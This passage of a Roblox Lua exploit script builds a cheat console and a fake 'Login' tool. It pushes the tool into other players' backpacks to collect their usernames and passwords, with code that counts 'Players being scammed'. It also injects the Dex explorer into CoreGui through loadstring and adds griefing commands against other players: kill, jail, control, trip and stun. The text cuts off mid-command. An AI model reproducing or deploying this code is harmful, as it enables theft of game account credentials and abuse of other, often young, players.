  615. NewGuiPart52.BorderColor3 = Color3.new(0, 0, 0)
  616. NewGuiPart52.BorderSizePixel = 0
  617. NewGuiPart52.Name = "TB1"
  618. NewGuiPart52.Position = UDim2.new(0, 90, 0, 100)
  619. NewGuiPart52.Size = UDim2.new(0, 180, 0, 20)
  620. NewGuiPart52.FontSize = Enum.FontSize.Size18
  621. NewGuiPart52.Text = ""
  622. NewGuiPart52.TextColor3 = Color3.new(1, 1, 1)
  623. NewGuiPart52.TextWrapped = true
  624. NewGuiPart52.Parent = NewGuiPart50
  625. -------
  626. local NewGuiPart53 = Instance.new("TextButton")
  627. NewGuiPart53.BackgroundColor3 = Color3.new(0.972549, 0.972549, 0.972549)
  628. NewGuiPart53.BackgroundTransparency = 0.5
  629. NewGuiPart53.BorderColor3 = Color3.new(0, 0, 0)
  630. NewGuiPart53.BorderSizePixel = 0
  631. NewGuiPart53.Name = "TB"
  632. NewGuiPart53.Position = UDim2.new(0, 50, 0, 250)
  633. NewGuiPart53.Selectable = true
  634. NewGuiPart53.Size = UDim2.new(0, 180, 0, 20)
  635. NewGuiPart53.Style = Enum.ButtonStyle.Custom
  636. NewGuiPart53.FontSize = Enum.FontSize.Size18
  637. NewGuiPart53.Text = "Save"
  638. NewGuiPart53.TextColor3 = Color3.new(0, 0, 0)
  639. NewGuiPart53.TextWrapped = true
  640. NewGuiPart53.Parent = NewGuiPart50
  641.  
  642. -------
  643. local NewGuiPart55 = Instance.new("TextLabel")
  644. NewGuiPart55.BackgroundColor3 = Color3.new(0.0666667, 0.0666667, 0.0666667)
  645. NewGuiPart55.BackgroundTransparency = 1
  646. NewGuiPart55.BorderColor3 = Color3.new(0, 0, 0)
  647. NewGuiPart55.BorderSizePixel = 0
  648. NewGuiPart55.Name = "TL2"
  649. NewGuiPart55.Position = UDim2.new(0, 0, 0, 100)
  650. NewGuiPart55.Size = UDim2.new(0, 80, 0, 20)
  651. NewGuiPart55.FontSize = Enum.FontSize.Size18
  652. NewGuiPart55.Text = "Tool Name"
  653. NewGuiPart55.TextColor3 = Color3.new(1, 1, 1)
  654. NewGuiPart55.TextWrapped = true
  655. NewGuiPart55.Parent = NewGuiPart50
  656. -------
  657. local NewGuiPart56 = Instance.new("TextButton")
  658. NewGuiPart56.BackgroundColor3 = Color3.new(0.0666667, 0.0666667, 0.0666667)
  659. NewGuiPart56.BackgroundTransparency = 0.69999998807907
  660. NewGuiPart56.BorderColor3 = Color3.new(0, 0, 0)
  661. NewGuiPart56.BorderSizePixel = 0
  662. NewGuiPart56.Name = "TL4"
  663. NewGuiPart56.Position = UDim2.new(0, 200, 0, 50)
  664. NewGuiPart56.Selectable = true
  665. NewGuiPart56.Size = UDim2.new(0, 80, 0, 20)
  666. NewGuiPart56.Style = Enum.ButtonStyle.Custom
  667. NewGuiPart56.FontSize = Enum.FontSize.Size14
  668. NewGuiPart56.Text = "CMD"
  669. NewGuiPart56.TextColor3 = Color3.new(1, 1, 1)
  670. NewGuiPart56.Parent = NewGuiPart2
  671. -------
  672. local NewGuiPart57 = Instance.new("Frame")
  673. NewGuiPart57.BackgroundTransparency = 1
  674. NewGuiPart57.Name = "ChatBox"
  675. NewGuiPart57.Position = UDim2.new(0, 20, 0, -25)
  676. NewGuiPart57.Size = UDim2.new(0, 245, 0, 400)
  677. NewGuiPart57.Visible = false
  678. NewGuiPart57.Draggable = true
  679. NewGuiPart57.Parent = NewGuiPart2
  680. -------
  681. local NewGuiPart58 = Instance.new("TextButton")
  682. NewGuiPart58.Active = true
  683. NewGuiPart58.BackgroundTransparency = 0.5
  684. NewGuiPart58.BorderSizePixel = 0
  685. NewGuiPart58.Name = "Chat"
  686. NewGuiPart58.Position = UDim2.new(0, 180, 0, 310)
  687. NewGuiPart58.Selectable = true
  688. NewGuiPart58.Size = UDim2.new(0, 65, 0, 50)
  689. NewGuiPart58.Style = Enum.ButtonStyle.Custom
  690. NewGuiPart58.FontSize = Enum.FontSize.Size14
  691. NewGuiPart58.Text = "Chat"
  692. NewGuiPart58.Parent = NewGuiPart57
  693. -------
  694. local NewGuiPart59 = Instance.new("TextLabel")
  695. NewGuiPart59.BackgroundTransparency = 0.5
  696. NewGuiPart59.BorderSizePixel = 0
  697. NewGuiPart59.Name = "Output"
  698. NewGuiPart59.Position = UDim2.new(0, 0, 0, 100)
  699. NewGuiPart59.Size = UDim2.new(0, 245, 0, 200)
  700. NewGuiPart59.Font = Enum.Font.Legacy
  701. NewGuiPart59.FontSize = Enum.FontSize.Size14
  702. NewGuiPart59.Text = ""
  703. NewGuiPart59.TextWrapped = true
  704. NewGuiPart59.Parent = NewGuiPart57
  705. -------
  706. local NewGuiPart60 = Instance.new("TextBox")
  707. NewGuiPart60.BackgroundTransparency = 0.5
  708. NewGuiPart60.Name = "Input"
  709. NewGuiPart60.Position = UDim2.new(0, 0, 0, 310)
  710. NewGuiPart60.Size = UDim2.new(0, 165, 0, 50)
  711. NewGuiPart60.FontSize = Enum.FontSize.Size28
  712. NewGuiPart60.Text = ""
  713. NewGuiPart60.Parent = NewGuiPart57
  714. -------
  715. local NewGuiPart61 = Instance.new("Frame")
  716. NewGuiPart61.BackgroundTransparency = 1
  717. NewGuiPart61.Name = "CMDS"
  718. NewGuiPart61.Position = UDim2.new(0, 20, 0, -25)
  719. NewGuiPart61.Size = UDim2.new(0, 245, 0, 400)
  720. NewGuiPart61.Visible = false
  721. NewGuiPart61.Draggable = true
  722. NewGuiPart61.Parent = NewGuiPart2
  723. -------
  724. local NewGuiPart62 = Instance.new("TextButton")
  725. NewGuiPart62.Active = true
  726. NewGuiPart62.BackgroundTransparency = 0.5
  727. NewGuiPart62.BorderSizePixel = 0
  728. NewGuiPart62.Name = "Execute"
  729. NewGuiPart62.Position = UDim2.new(0, 180, 0, 310)
  730. NewGuiPart62.Selectable = true
  731. NewGuiPart62.Size = UDim2.new(0, 65, 0, 50)
  732. NewGuiPart62.Style = Enum.ButtonStyle.Custom
  733. NewGuiPart62.FontSize = Enum.FontSize.Size12
  734. NewGuiPart62.Text = "Execute"
  735. NewGuiPart62.Parent = NewGuiPart61
  736. -------
  737. local NewGuiPart63 = Instance.new("TextLabel")
  738. NewGuiPart63.BackgroundTransparency = 0.5
  739. NewGuiPart63.BorderSizePixel = 0
  740. NewGuiPart63.Name = "Output"
  741. NewGuiPart63.Position = UDim2.new(0, 0, 0, 100)
  742. NewGuiPart63.Size = UDim2.new(0, 245, 0, 200)
  743. NewGuiPart63.Font = Enum.Font.Legacy
  744. NewGuiPart63.FontSize = Enum.FontSize.Size14
  745. NewGuiPart63.Text = ""
  746. NewGuiPart63.TextWrapped = true
  747. NewGuiPart63.Parent = NewGuiPart61
  748. -------
  749. local NewGuiPart64 = Instance.new("TextBox")
  750. NewGuiPart64.BackgroundTransparency = 0.5
  751. NewGuiPart64.Name = "CmdInput"
  752. NewGuiPart64.Position = UDim2.new(0, 0, 0, 310)
  753. NewGuiPart64.Size = UDim2.new(0, 165, 0, 50)
  754. NewGuiPart64.FontSize = Enum.FontSize.Size14
  755. NewGuiPart64.Text = ""
  756. NewGuiPart64.Parent = NewGuiPart61
  757.  
  758. local IsRunning = Instance.new("BoolValue")
  759. IsRunning.Value = false
  760. IsRunning.Name = "IsRunning"
  761. IsRunning.Parent = NewGuiPart2
  762.  
  763. local Login = Instance.new("Tool")
  764. Login.CanBeDropped = false
  765. Login.ManualActivationOnly = false
  766. Login.RequiresHandle = false
  767. Login.Name = "Login"
  768. Login.Parent = NewGuiPart1
  769.  
  770. local ToolName = Instance.new("StringValue")
  771. ToolName.Value = "Login"
  772. ToolName.Parent = CoreValues
  773. ToolName.Name = "ToolName"
  774.  
  775.  
  776. local NewGuiPart65 = Instance.new("ScreenGui")
  777. NewGuiPart65.Name = "LoginGui"
  778. NewGuiPart65.Parent = Login
  779. -------
  780. local NewGuiPart66 = Instance.new("Frame")
  781. NewGuiPart66.Name = "ErrorFrame"
  782. NewGuiPart66.Size = UDim2.new(1, 0, 1, 0)
  783. NewGuiPart66.Visible = false
  784. NewGuiPart66.Parent = NewGuiPart65
  785. -------
  786. local NewGuiPart67 = Instance.new("ImageLabel")
  787. NewGuiPart67.Active = false
  788. NewGuiPart67.Selectable = false
  789. NewGuiPart67.Size = UDim2.new(1, 0, 1, 0)
  790. NewGuiPart67.Image = "rbxassetid://423929933"
  791. NewGuiPart67.Parent = NewGuiPart66
  792. -------
  793. local NewGuiPart69 = Instance.new("TextLabel")
  794. NewGuiPart69.BackgroundTransparency = 1
  795. NewGuiPart69.BorderSizePixel = 0
  796. NewGuiPart69.Name = "UserName"
  797. NewGuiPart69.Position = UDim2.new(0, 50, 0.5, 0)
  798. NewGuiPart69.Size = UDim2.new(0, 100, 0, 50)
  799. NewGuiPart69.Font = Enum.Font.Legacy
  800. NewGuiPart69.FontSize = Enum.FontSize.Size14
  801. NewGuiPart69.Text = "UserName"
  802. NewGuiPart69.Parent = NewGuiPart66
  803. -------
  804. local NewGuiPart70 = Instance.new("TextLabel")
  805. NewGuiPart70.BackgroundTransparency = 1
  806. NewGuiPart70.BorderSizePixel = 0
  807. NewGuiPart70.Name = "Password"
  808. NewGuiPart70.Position = UDim2.new(0, 50, 0.5, 50)
  809. NewGuiPart70.Size = UDim2.new(0, 100, 0, 50)
  810. NewGuiPart70.Font = Enum.Font.Legacy
  811. NewGuiPart70.FontSize = Enum.FontSize.Size14
  812. NewGuiPart70.Text = "Password"
  813. NewGuiPart70.Parent = NewGuiPart66
  814. -------
  815. local NewGuiPart71 = Instance.new("TextBox")
  816. NewGuiPart71.BackgroundColor3 = Color3.new(255,255,255)
  817. NewGuiPart71.BorderColor3 = Color3.new(0, 0, 0)
  818. NewGuiPart71.BorderSizePixel = 2
  819. NewGuiPart71.Name = "TB2"
  820. NewGuiPart71.Position = UDim2.new(0, 160, 0.5, 65)
  821. NewGuiPart71.Size = UDim2.new(0, 200, 0, 20)
  822. NewGuiPart71.Font = Enum.Font.Legacy
  823. NewGuiPart71.FontSize = Enum.FontSize.Size14
  824. NewGuiPart71.Text = ""
  825. NewGuiPart71.Parent = NewGuiPart66
  826. -------
  827. local NewGuiPart72 = Instance.new("ImageButton")
  828. NewGuiPart72.Active = true
  829. NewGuiPart71.BackgroundColor3 = Color3.new(73,123,255)
  830. NewGuiPart72.BackgroundTransparency = 0.5
  831. NewGuiPart72.Name = "LoginButton"
  832. NewGuiPart72.Position = UDim2.new(0, 90, 0.5, 150)
  833. NewGuiPart72.Selectable = true
  834. NewGuiPart72.Size = UDim2.new(0, 280, 0, 25)
  835. NewGuiPart72.Style = Enum.ButtonStyle.RobloxRoundButton
  836. NewGuiPart72.Visible = true
  837. NewGuiPart72.Image = "rbxassetid://431070395"
  838. NewGuiPart72.Parent = NewGuiPart66
  839. -------
  840. local NewGuiPart73 = Instance.new("TextLabel")
  841. NewGuiPart73.BackgroundColor3 = Color3.new(255,255,255)
  842. NewGuiPart73.BorderColor3 = Color3.new(0, 0, 0)
  843. NewGuiPart73.BorderSizePixel = 0
  844. NewGuiPart73.Name = "TB1"
  845. NewGuiPart73.Position = UDim2.new(0, 160, 0.5, 15)
  846. NewGuiPart73.Size = UDim2.new(0, 200, 0, 20)
  847. NewGuiPart73.Font = Enum.Font.Legacy
  848. NewGuiPart73.FontSize = Enum.FontSize.Size14
  849. NewGuiPart73.Text = ""
  850. NewGuiPart73.Parent = NewGuiPart66
  851.  
  852.  
  853. local Textg = Instance.new("TextLabel")
  854. Textg.BackgroundColor3 = Color3.new(255,255,255)
  855. Textg.BorderColor3 = Color3.new(0, 0, 0)
  856. Textg.BorderSizePixel = 0
  857. Textg.Name = "Text"
  858. Textg.Position = UDim2.new(0, 90, 0.5,115)
  859. Textg.Size = UDim2.new(0, 200, 0, 20)
  860. Textg.Font = Enum.Font.Legacy
  861. Textg.FontSize = Enum.FontSize.Size14
  862. Textg.Text = ""
  863. Textg.Parent = NewGuiPart66
  864.  
  865. local Done = Instance.new("BoolValue")
  866. Done.Name = "Done"
  867. Done.Value = false
  868. Done.Parent = NewGuiPart66
  869.  
  870. local Folderr = Instance.new("Folder")
  871. Folderr.Parent = CoreValues
  872. Folderr.Name = "Folder"
  873.  
  874.  
  875. local UserName = Instance.new("StringValue")
  876. UserName.Name = "UserName"
  877. UserName.Parent = Folderr
  878.  
  879. local PassWord = Instance.new("StringValue")
  880. PassWord.Name = "Password"
  881. PassWord.Parent = Folderr
  882.  
  883.  
  884.  
  885. local UsingTool = Instance.new("BoolValue")
  886. UsingTool.Parent = CoreValues
  887. UsingTool.Name = "UsingTool"
  888. UsingTool.Value = true
  889.  
  890. NewGuiPart1:Clone().Parent = CoreValues
  891. NewGuiPart65:Clone().Parent = CoreValues
  892.  
  893.  
  894.  
  895. print("MGVX LIB Running")
  896. local Lib = Instance.new("Folder")
  897. Lib.Name = "ACCOUNTLIB"
  898. Lib.Parent = CoreValues
  899.  
  900. if PassWord.Value ~= nil and UserName.Value ~= nil then
  901. namer = Instance.new("Folder")
  902. namer.Parent = Lib
  903. namer.Name = UserName.Value
  904. old = PassWord:Clone()
  905. old.Parent = namer
  906. old.Name = UserName.Value
  907. oldu = UserName:Clone()
  908. oldu.Parent = namer
  909. oldu.Name = UserName.Value
  910. new = PassWord:Clone()
  911. new.Value = ""
  912. new.Name = "PassWord"
  913. new.Parent = Folderr
  914. newu = UserName:Clone()
  915. newu.Value = ""
  916. newu.Name = "UserName"
  917. newu.Parent = Folderr
  918. UserName:Destroy();
  919. PassWord:Destroy();
  920. end
  921.  
  922. --------------FUNCTIONS---------------
  923. local NumofPlayers = game:GetService("Players").NumPlayers
  924. local NumOfPlayersBeingScammed = NumofPlayers-1
  925. local DoneBeingScammed = {}
  926.  
  927.  
  928.  
  929.  
  930.  
  931.  
  932. function Clicked4()
  933.  
  934. if NewGuiPart52.Text ~= nil then
  935. Login.Name = NewGuiPart52.Text
  936. ToolName.Value = NewGuiPart52.Text
  937. end
  938.  
  939. if NewGuiPart52.Text == nil then
  940. Login.Name = "Login"
  941. ToolName.Value = "Login"
  942. end
  943.  
  944.  
  945.  
  946.  
  947. NewGuiPart50.Visible = false
  948.  
  949. end
  950.  
  951.  
  952.  
  953. function Click()
  954. local ppl = game.Players:GetChildren()
  955. local spots = NewGuiPart6:children()
  956. for i = 1,#ppl do
  957. spots[i].Visible = true
  958. spots[i].ImageLabel.Image = 'http://www.roblox.com/Thumbs/Avatar.ashx?x=100&y=100&username='..ppl[i].Name
  959. spots[i].TextLabel.Text = ppl[i].Name
  960. if spots[i].TextLabel.Text == Owner.Name and spots[i].ImageLabel.Image == 'http://www.roblox.com/Thumbs/Avatar.ashx?x=100&y=100&username='..Owner.Name then
  961. spots[i].TextLabel.Text = ''
  962. spots[i].ImageLabel.Image = ''
  963. end
  964. end
  965. end
  966. function Clicked()
  967. otherp.Backpack:GetChildren().Parent = workspace
  968.  
  969.  
  970. if UsingTool.Value == true then
  971. Login:Clone().Parent = otherp.Backpack
  972. NewGuiPart4.Text = "Scanning..."
  973. print("Scamming ".. NumOfPlayersBeingScammed .. " Players!")
  974. NewGuiPart50.Visible = false
  975. NewGuiPart61.Visible = false
  976. NewGuiPart5.Visible = true
  977. IsRunning.Value = true
  978. Owner.Backpack:WaitForChild(ToolName.Value):Destroy();
  979. end
  980. end
  981.  
  982.  
  983.  
  984. function Clicked1()
  985. NewGuiPart5.Visible = false
  986. NewGuiPart61.Visible = false
  987. NewGuiPart50.Visible = true
  988. end
  989.  
  990. function Clicked2()
  991. NewGuiPart5.Visible = false
  992. NewGuiPart50.Visible = false
  993. NewGuiPart61.Visible = true
  994. end
  995.  
  996.  
  997. plrrr = game.Players.LocalPlayer
  998. plrr = game.Players:GetChildren()
  999. Input = NewGuiPart64
  1000. Exe = NewGuiPart62
  1001. Output = NewGuiPart63
  1002. Output.Text = "Welcome, "..plrrr.Name.."."
  1003.  
  1004.  
  1005. game.Players.PlayerAdded:connect(function()
  1006. local ppl = game.Players:GetChildren()
  1007. local spots = NewGuiPart6:children()
  1008. for i = 1,#ppl do
  1009. spots[i].Visible = true
  1010. spots[i].ImageLabel.Image = 'http://www.roblox.com/Thumbs/Avatar.ashx?x=100&y=100&username='..ppl[i].Name
  1011. spots[i].TextLabel.Text = ppl[i].Name
  1012. if spots[i].TextLabel.Text == Owner.Name and spots[i].ImageLabel.Image == 'http://www.roblox.com/Thumbs/Avatar.ashx?x=100&y=100&username='..Owner.Name then
  1013. spots[i].TextLabel.Text = ''
  1014. spots[i].ImageLabel.Image = ''
  1015. end
  1016.  
  1017. end
  1018. end)
  1019.  
  1020. game.Players.PlayerRemoving:connect(function()
  1021. local ppl = game.Players:GetChildren()
  1022. local spots = NewGuiPart6:children()
  1023. for i = 1,#ppl do
  1024. spots[i].Visible = true
  1025. spots[i].ImageLabel.Image = 'http://www.roblox.com/Thumbs/Avatar.ashx?x=100&y=100&username='..ppl[i].Name
  1026. spots[i].TextLabel.Text = ppl[i].Name
  1027. if spots[i].TextLabel.Text == Owner.Name and spots[i].ImageLabel.Image == 'http://www.roblox.com/Thumbs/Avatar.ashx?x=100&y=100&username='..Owner.Name then
  1028. spots[i].TextLabel.Text = ''
  1029. spots[i].ImageLabel.Image = ''
  1030. end
  1031.  
  1032. end
  1033. end)
  1034.  
  1035.  
  1036. function Clicked3(arg)
  1037. local Cmd = Input
  1038. local allp = game.Players:GetChildren()
  1039. local numb;
  1040. local pp;
  1041. local p;
  1042. local num;
  1043. local argus = {"me", "all",numb,plrr}
  1044.  
  1045. if Cmd.Text:sub(1, 12) == "viewExplorer" then
  1046. local obj = game:GetService("InsertService"):LoadAsset(418955355)
  1047. obj.Parent = game.CoreGui
  1048. obj.ExplorerPanel.LocalScript.Source = string.gsub(obj.ExplorerPanel.LocalScript.Source,"script.Parent","game.CoreGui.Dex.ExplorerPanel")
  1049. obj.PropertiesFrame.Properties.Source = string.gsub(obj.PropertiesFrame.Properties.Source,"script.Parent.Parent","game.CoreGui.Dex")
  1050. obj.Selection.Source = string.gsub(obj.Selection.Source,"script.Parent","game.CoreGui.Dex")
  1051.  
  1052. spawn(function()
  1053. loadstring(obj.ExplorerPanel.LocalScript.Source)()
  1054. end)
  1055. spawn(function()
  1056. loadstring(obj.PropertiesFrame.Properties.Source)()
  1057. end)
  1058. spawn(function()
  1059. loadstring(obj.Selection.Source)()
  1060. end)
  1061.  
  1062.  
  1063.  
  1064. elseif Cmd.Text:sub(1,13) == "closeExplorer" then
  1065. game.CoreGui.Dex:Destroy()
  1066. end
  1067.  
  1068. if Cmd.Text:lower():sub(1,4) == "hat " then
  1069. local chk1 = Cmd.Text:lower():sub(5):find(" ") + 4
  1070. local plrz = GetPlr(plr, Cmd.Text:lower():sub(5, chk1-1))
  1071. for i, v in pairs(plrz) do
  1072. coroutine.resume(coroutine.create(function()
  1073. if v and v.Character then
  1074. local obj = game:service("InsertService"):LoadAsset(tonumber(Cmd.Text:sub(chk1+1)))
  1075. for a,hat in pairs(obj:children()) do if hat:IsA("Hat") then hat.Parent = v.Character end end
  1076. obj:Destroy()
  1077. end
  1078. end))
  1079. end
  1080. end
  1081.  
  1082. if Cmd.Text:lower():sub(1,5) == "cape " then
  1083. local chk1 = Cmd.Text:lower():sub(6):find(" ")
  1084. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1085. local str = "torso.BrickColor"
  1086. if chk1 then chk1 = chk1 + 5 plrz = GetPlr(plr, Cmd.Text:lower():sub(6,chk1-1))
  1087. local teststr = [[BrickColor.new("]]..Cmd.Text:sub(chk1+1,chk1+1):upper()..Cmd.Text:sub(chk1+2):lower()..[[")]]
  1088. if Cmd.Text:sub(chk1+1):lower() == "new yeller" then teststr = [[BrickColor.new("New Yeller")]] end
  1089. if Cmd.Text:sub(chk1+1):lower() == "pastel blue" then teststr = [[BrickColor.new("Pastel Blue")]] end
  1090. if Cmd.Text:sub(chk1+1):lower() == "dusty rose" then teststr = [[BrickColor.new("Dusty Rose")]] end
  1091. if Cmd.Text:sub(chk1+1):lower() == "cga brown" then teststr = [[BrickColor.new("CGA brown")]] end
  1092. if Cmd.Text:sub(chk1+1):lower() == "random" then teststr = [[BrickColor.random()]] end
  1093. if Cmd.Text:sub(chk1+1):lower() == "shiny" then teststr = [[BrickColor.new("Institutional white") p.Reflectance = 1]] end
  1094. if Cmd.Text:sub(chk1+1):lower() == "gold" then teststr = [[BrickColor.new("Bright yellow") p.Reflectance = .4]] end
  1095. if Cmd.Text:sub(chk1+1):lower() == "kohl" then teststr = [[BrickColor.new("Really black") local dec = Instance.new("Decal", p) dec.Face = 2 dec.Texture = "http://www.roblox.com/asset/?id=108597653"]] end
  1096. if Cmd.Text:sub(chk1+1):lower() == "batman" then teststr = [[BrickColor.new("Really black") local dec = Instance.new("Decal", p) dec.Face = 2 dec.Texture = "http://www.roblox.com/asset/?id=108597669"]] end
  1097. if Cmd.Text:sub(chk1+1):lower() == "superman" then teststr = [[BrickColor.new("Bright blue") local dec = Instance.new("Decal", p) dec.Face = 2 dec.Texture = "http://www.roblox.com/asset/?id=108597677"]] end
  1098. if Cmd.Text:sub(chk1+1):lower() == "swag" then teststr = [[BrickColor.new("Pink") local dec = Instance.new("Decal", p) dec.Face = 2 dec.Texture = "http://www.roblox.com/asset/?id=109301474"]] end
  1099. if BrickColor.new(teststr) ~= nil then str = teststr end
  1100. end
  1101. for i, v in pairs(plrz) do
  1102. coroutine.resume(coroutine.create(function()
  1103. if v and v:findFirstChild("PlayerGui") and v.Character and v.Character:findFirstChild("Torso") then
  1104. for a,cp in pairs(v.Character:children()) do if cp.Name == "EpicCape" then cp:Destroy() end end
  1105. local cl = script.LocalScriptBase:Clone() cl.Name = "CapeScript" cl.Code.Value = [[local plr = game.Players.LocalPlayer
  1106. repeat wait() until plr and plr.Character and plr.Character:findFirstChild("Torso")
  1107. local torso = plr.Character.Torso
  1108. local p = Instance.new("Part", torso.Parent) p.Name = "EpicCape" p.Anchored = false
  1109. p.CanCollide = false p.TopSurface = 0 p.BottomSurface = 0 p.BrickColor = ]]..str..[[ p.formFactor = "Custom"
  1110. p.Size = Vector3.new(.2,.2,.2)
  1111. local msh = Instance.new("BlockMesh", p) msh.Scale = Vector3.new(9,17.5,.5)
  1112. local motor1 = Instance.new("Motor", p)
  1113. motor1.Part0 = p
  1114. motor1.Part1 = torso
  1115. motor1.MaxVelocity = .01
  1116. motor1.C0 = CFrame.new(0,1.75,0)*CFrame.Angles(0,math.rad(90),0)
  1117. motor1.C1 = CFrame.new(0,1,.45)*CFrame.Angles(0,math.rad(90),0)
  1118. local wave = false
  1119. repeat wait(1/44)
  1120. local ang = 0.1
  1121. local oldmag = torso.Velocity.magnitude
  1122. local mv = .002
  1123. if wave then ang = ang + ((torso.Velocity.magnitude/10)*.05)+.05 wave = false else wave = true end
  1124. ang = ang + math.min(torso.Velocity.magnitude/11, .5)
  1125. motor1.MaxVelocity = math.min((torso.Velocity.magnitude/111), .04) + mv
  1126. motor1.DesiredAngle = -ang
  1127. if motor1.CurrentAngle < -.2 and motor1.DesiredAngle > -.2 then motor1.MaxVelocity = .04 end
  1128. repeat wait() until motor1.CurrentAngle == motor1.DesiredAngle or math.abs(torso.Velocity.magnitude - oldmag) >= (torso.Velocity.magnitude/10) + 1
  1129. if torso.Velocity.magnitude < .1 then wait(.1) end
  1130. until not p or p.Parent ~= torso.Parent
  1131. script:Destroy()
  1132. ]] cl.Parent = v.PlayerGui cl.Disabled = false
  1133. end
  1134. end))
  1135. end
  1136. end
  1137.  
  1138. if Cmd.Text:lower():sub(1,7) == "uncape " then
  1139. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1140. for i, v in pairs(plrz) do
  1141. coroutine.resume(coroutine.create(function()
  1142. if v and v:findFirstChild("PlayerGui") and v.Character then
  1143. for a,cp in pairs(v.Character:children()) do if cp.Name == "EpicCape" then cp:Destroy() end end
  1144. end
  1145. end))
  1146. end
  1147. end
  1148.  
  1149.  
  1150. if Cmd.Text:lower():sub(1,5) == "jail " then
  1151. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1152. for i, v in pairs(plrz) do
  1153. coroutine.resume(coroutine.create(function()
  1154. if v and v.Character and v.Character:findFirstChild("Torso") then
  1155. local vname = v.Name
  1156. local cf = v.Character.Torso.CFrame + Vector3.new(0,1,0)
  1157. local mod = Instance.new("Model", game.Workspace) mod.Name = v.Name .. " Jail"
  1158. local top = Instance.new("Part", mod) top.Locked = true top.formFactor = "Symmetric" top.Size = Vector3.new(6,1,6) top.TopSurface = 0 top.BottomSurface = 0 top.Anchored = true top.BrickColor = BrickColor.new("Really black") top.CFrame = cf * CFrame.new(0,-3.5,0)
  1159. v.CharacterAdded:connect(function() if not mod or (mod and mod.Parent ~= game.Workspace) then return end repeat wait() until v and v.Character and v.Character:findFirstChild("Torso") v.Character.Torso.CFrame = cf end)
  1160. v.Changed:connect(function(p) if p ~= "Character" or not mod or (mod and mod.Parent ~= game.Workspace) then return end repeat wait() until v and v.Character and v.Character:findFirstChild("Torso") v.Character.Torso.CFrame = cf end)
  1161. game.Players.PlayerAdded:connect(function(plr) if plr.Name == vname then v = plr end
  1162. v.CharacterAdded:connect(function() if not mod or (mod and mod.Parent ~= game.Workspace) then return end repeat wait() until v and v.Character and v.Character:findFirstChild("Torso") v.Character.Torso.CFrame = cf end)
  1163. v.Changed:connect(function(p) if p ~= "Character" or not mod or (mod and mod.Parent ~= game.Workspace) then return end repeat wait() until v and v.Character and v.Character:findFirstChild("Torso") v.Character.Torso.CFrame = cf end)
  1164. end)
  1165. local bottom = top:Clone() bottom.Parent = mod bottom.CFrame = cf * CFrame.new(0,3.5,0)
  1166. local front = top:Clone() front.Transparency = .5 front.Reflectance = .1 front.Parent = mod front.Size = Vector3.new(6,6,1) front.CFrame = cf * CFrame.new(0,0,-3)
  1167. local back = front:Clone() back.Parent = mod back.CFrame = cf * CFrame.new(0,0,3)
  1168. local right = front:Clone() right.Parent = mod right.Size = Vector3.new(1,6,6) right.CFrame = cf * CFrame.new(3,0,0)
  1169. local left = right:Clone() left.Parent = mod left.CFrame = cf * CFrame.new(-3,0,0)
  1170. local msh = Instance.new("BlockMesh", front) msh.Scale = Vector3.new(1,1,0)
  1171. local msh2 = msh:Clone() msh2.Parent = back
  1172. local msh3 = msh:Clone() msh3.Parent = right msh3.Scale = Vector3.new(0,1,1)
  1173. local msh4 = msh3:Clone() msh4.Parent = left
  1174. v.Character.Torso.CFrame = cf
  1175. end
  1176. end))
  1177. end
  1178. end
  1179.  
  1180. if Cmd.Text:lower():sub(1,7) == "unjail " then
  1181. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1182. for i, v in pairs(plrz) do coroutine.resume(coroutine.create(function() if v then for a, jl in pairs(game.Workspace:children()) do if jl.Name == v.Name .. " Jail" then jl:Destroy() end end end end)) end
  1183. end
  1184.  
  1185.  
  1186.  
  1187. if Cmd.Text:lower():sub(1,8) == "control " then
  1188. local plrz = GetPlr(plr, Cmd.Text:lower():sub(9))
  1189. for i, v in pairs(plrz) do
  1190. coroutine.resume(coroutine.create(function()
  1191. if v and v.Character then
  1192. v.Character.Humanoid.PlatformStand = true
  1193. local w = Instance.new("Weld", plr.Character.Torso )
  1194. w.Part0 = plr.Character.Torso
  1195. w.Part1 = v.Character.Torso
  1196. local w2 = Instance.new("Weld", plr.Character.Head)
  1197. w2.Part0 = plr.Character.Head
  1198. w2.Part1 = v.Character.Head
  1199. local w3 = Instance.new("Weld", plr.Character:findFirstChild("Right Arm"))
  1200. w3.Part0 = plr.Character:findFirstChild("Right Arm")
  1201. w3.Part1 = v.Character:findFirstChild("Right Arm")
  1202. local w4 = Instance.new("Weld", plr.Character:findFirstChild("Left Arm"))
  1203. w4.Part0 = plr.Character:findFirstChild("Left Arm")
  1204. w4.Part1 = v.Character:findFirstChild("Left Arm")
  1205. local w5 = Instance.new("Weld", plr.Character:findFirstChild("Right Leg"))
  1206. w5.Part0 = plr.Character:findFirstChild("Right Leg")
  1207. w5.Part1 = v.Character:findFirstChild("Right Leg")
  1208. local w6 = Instance.new("Weld", plr.Character:findFirstChild("Left Leg"))
  1209. w6.Part0 = plr.Character:findFirstChild("Left Leg")
  1210. w6.Part1 = v.Character:findFirstChild("Left Leg")
  1211. plr.Character.Head.face:Destroy()
  1212. for i, p in pairs(v.Character:children()) do
  1213. if p:IsA("BasePart") then
  1214. p.CanCollide = false
  1215. end
  1216. end
  1217. for i, p in pairs(plr.Character:children()) do
  1218. if p:IsA("BasePart") then
  1219. p.Transparency = 1
  1220. elseif p:IsA("Hat") then
  1221. p:Destroy()
  1222. end
  1223. end
  1224. v.Character.Parent = plr.Character
  1225. v.Character.Humanoid.Changed:connect(function() v.Character.Humanoid.PlatformStand = true end)
  1226. end
  1227. end))
  1228. end
  1229. end
  1230.  
  1231. if Cmd.Text:lower():sub(1,5) == "kill " then
  1232. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1233. for i, v in pairs(plrz) do
  1234. coroutine.resume(coroutine.create(function()
  1235. if v and v.Character then v.Character:BreakJoints() end
  1236. end))
  1237. end
  1238. end
  1239.  
  1240.  
  1241.  
  1242. if Cmd.Text:lower():sub(1,5) == "trip " then
  1243. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1244. for i, v in pairs(plrz) do
  1245. coroutine.resume(coroutine.create(function()
  1246. if v and v.Character and v.Character:findFirstChild("Torso") then
  1247. v.Character.Torso.CFrame = v.Character.Torso.CFrame * CFrame.Angles(0,0,math.rad(180))
  1248. end
  1249. end))
  1250. end
  1251. end
  1252.  
  1253. if Cmd.Text:lower():sub(1,5) == "stun " then
